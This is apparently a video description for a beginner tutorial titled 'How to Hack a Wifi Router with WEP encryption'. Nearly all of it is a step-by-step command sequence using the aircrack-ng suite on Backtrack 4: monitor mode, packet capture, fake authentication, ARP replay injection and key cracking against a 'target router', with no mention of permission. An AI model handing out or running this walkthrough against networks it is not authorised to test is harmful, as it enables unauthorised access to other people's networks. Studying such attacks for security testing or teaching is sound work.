[View \| Download]	Hacking - How to Hack a Wifi Router with WEP encryption - For Beginners For a complete break-down of this video, please visit my website under the write-ups section: http://top-hat-sec.com/main/?page_id=110 In this video I show you how to do a simple hack on a WEP encrypted Wifi Router. There is more than one way to do this but I believe this is the easiest. I am using Backtrack 4 and VMware. Once you are in linux you will need to open up a konsole and type in: airmon-ng make sure that your interface shows up. Mine is wlan0 but yours may be different. To scan for nearby networks type: airodump-ng wlan0 (or your correct interface name) This will display all of the nearby routers. If you get an error at this point, you may need to put your card into monitor mode by typing: airmon-ng start wlan0 (or your correct interface name) which should create a new interface listing as mon0 (it could be named different) At this point you will need to re-type airodump-ng mon0 (or the new interface name) If you still get an error please send me a message. locate the target router with WEP encryption and once found, hold ctrl and press C. This will stop the scanning. The following are the commands that I specifically used: airodump-ng -c 11 -w wepcrack --bssid (Paste BSSID) wlan0 (or your interface) open new konsole aireplay-ng -1 0 -a (Paste BSSID) -e (Paste ESSID) wlan0 (or your correct interface) once authentication was successful then I typed: aireplay-ng -3 -b (Paste BSSID) -e (Paste ESSID) wlan0 (or correct interface) This will begin to read and send packets open new konsole type in aircrack-ng wepcrack.cap (or if you named it a different file name, type that in .cap) Feel free to send a message.
